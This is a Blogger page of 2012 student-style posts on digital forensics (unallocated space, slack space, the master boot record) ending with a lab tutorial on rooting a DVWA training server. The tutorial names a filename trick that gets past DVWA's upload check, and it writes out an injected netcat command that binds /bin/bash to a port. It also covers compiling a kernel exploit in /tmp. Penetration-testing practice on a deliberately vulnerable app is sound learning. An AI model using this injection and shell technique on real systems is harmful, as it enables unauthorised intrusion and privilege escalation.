This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Sunday, March 18, 2012

File Structure

Magic Number

Unallocated Space

Definition

Unallocated space is logical space on a operating system hard drive, e.g Linux, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written with files.
Examples.
If the operating system writes a file to a certain space on the hard drive that part of the drive is now “allocated”, as the file is using it the space, and no other files can be written to that section. If that file is deleted then that part of the hard drive is no longer required to be “allocated” it becomes unallocated. This means that  new files can now be re-written to that location.
On a standard, working computer, files can only be written to the unallocated space.
If a newly formatted  drive is connected to a computer, virtually all of the drive space is unallocated space (a small amount of space will be taken up by files within the file system, e.g $MFT, etc). On a new drive the unallocated space is normally zeros, as files are written to the hard drive the zeros are over written with the file data
Working Example
Blank Drive
A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume its 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the hard drives.
If a 5 GB file, e.g a large movie, is placed on the drive, then there will be 1% (5 GB)  allocated space and 99% unallocated (495 GB)
If a 10 GB database file is now added to this hard drive there will be a total of 3 % (15 GB) of allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.
What happens when a file is deleted?
If the movie file, from the above example, is deleted the allocated space it was using will now become unallocated. I.e There will now be 2% allocated space (the 10 GB database) and 98% unallocated space.
However the data from the movie file is still on the hard drive, it does not just disappear, it just changes its status. This means that the following situation now exists:
There is 10 GB of allocated space and 490 GB of unallocated space.
Of the 490 GB, 485 GB would be all zeros, however 5 GB of the unallocated space would be the old movie data.
Until new files are written to the hard drive this movie file will remain deleted but still  recoverable from the hard drive. Even if new files are written it must overwrite the same unallocated space as the movie file, before the movie file is destroyed.
Unallocated space can only be accessed by specialist tools, and now directly from Windows. Such tools include:

Slack Space

Slack space is harddisk portions not fully used by the current allocated file, and containing data from a previously deleted file.


The example save a 768 bytes file (User_File.txt) that requires only sector 1 and 1/2 sector 2.  Depending on the operating system, the 256 bytes in sector 2 might be filled with 1′s or 0′s .  Sectors 3 and 4 would not be overwritten and considered slack space.  If the slack space contained data from a deleted file previously, the information could be recovered with forensic tools. Details of operating systems allocate files on the harddisk using clusters (a collection of contiguous sectors).  The operating system can address because a cluster is a smaller allocation unit. If a file does not utilize the full cluster, the space remaining portion  might not be overwritten and might contain data from a previously deleted file. It is important to understand that slace space is considered allocated space since it is part of an allocated cluster.  

Thursday, March 15, 2012

Master Boot Record

A master boot record (MBR) is boot sector type from IBM Personal Computer consisting of a sequence of 512 bytes that is ocated at the first sector of a data storage device like hard disk. MBR is usually placed on storage devices.

The use of MBR are :
  • As a partition table holding, which describes the partitions of a storage device. In this context the boot sector may also be called a partition sector.
  • Operating system bootstraping. The BIOS built into a PC-compatible computer loads the MBR from the storage device and passes execution to machine code instructions at the beginning of the MBR.
  • Uniquely identifying individual disk media, with a 32-bit disk signature, even though it may never be used by the operating system.

Monday, March 5, 2012

Root Exploitation via Web Vulnerability (DVWA)

In this tutorial we will practice how to exploit via Web Vulnerability. We use DVWA as the web.

We will upload our payload via file upload facility in DVWA (high level), then execute nc command to open socket and listening (medium level), then execute our payload.

1. Information Gatherin using Zenmap
We know that the OS kernel is 2.6.3.9

2. Search exploit code in exploit db

/pentest/exploits/exploitdb# ./searchsploit 2.6.3.9

3. Because upload facitility in high level in DVWA use validation for filename...
We have to change the file name into 18441.c.jpg
4. Upload the file
5. Command execution in medium level
192.168.212.103 | netcat -v -e '/bin/bash' -p 1234
6. Connec via nc

Change your dir position into path where exploit code uploaded



Rename the file

Compile the exploit code

7. Searching place for the exploit  where all user can execute it

We found that the palce is /tmp. So, put it into tmp, then  Run it